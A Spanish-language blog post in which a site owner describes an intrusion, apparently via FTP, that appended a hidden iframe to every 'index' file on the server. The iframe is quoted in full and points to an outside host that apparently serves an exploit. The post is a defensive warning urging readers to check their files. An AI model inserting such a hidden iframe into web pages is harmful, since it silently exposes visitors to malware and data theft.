Desde anoche hasta esta tarde el blog no funcionaba. Fue debido a que unos atacantes comprometieron la seguridad de mi servidor (parece ser que el ftp) consiguiendo editar con éxito todos y cada uno de los ficheros que contenían la cadena «index» en su nombre (index.php,  index.html, index_extra.php…) en las diferentes carpetas del mismo.

La edición de los ficheros consistió en añadir una línea al final de todos ellos (index.htm, index.php…) con el siguiente código:

<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>

El objetivo era utilizar mi servidor para hacer un ataque de Frame Injection dirigiendo a los visitantes de mi sitio a la url http://f5l.at:8080/ts/in.cgi?pepsi154, en la que está alojado el exploit dirigido al usuario final, que presumiblemente intentará obtener datos privados del mismo o instalar software malicioso en su equipo.

Me di cuenta «gracias» a que WordPress dejó de funcionar, por lo que la pérdida del servicio que ha sufrido el blog ha sido, más que un problema, un aviso.

Además, este tipo de ataques no solo pueden dañar al visitante de tu sitio sino que pueden hacer que tu dominio acabe en un listado de sitios malware.

Ahora conviene estar alerta, a partir de hoy cada día revisaré si existen ficheros modificados en mi servidor web ya que no me gustaría enviar a mis visitantes a merced de los atacantes.

He buscado información sobre la URL y he visto a otra  persona que le ha sucedido lo mismo:

http://exbb.org/community/topic.php?forum=6&topic=127&postid=1250884659

(Para quienes no entiendan Ruso, entre los que me incluyo ;), Aquí el link semitraducido por Google)

¿A alguien más le ha pasado?

Comprueba tus ficheros habitualmente, podrías estar redirigiendo sin saberlo a tus usuarios a un sitio Malware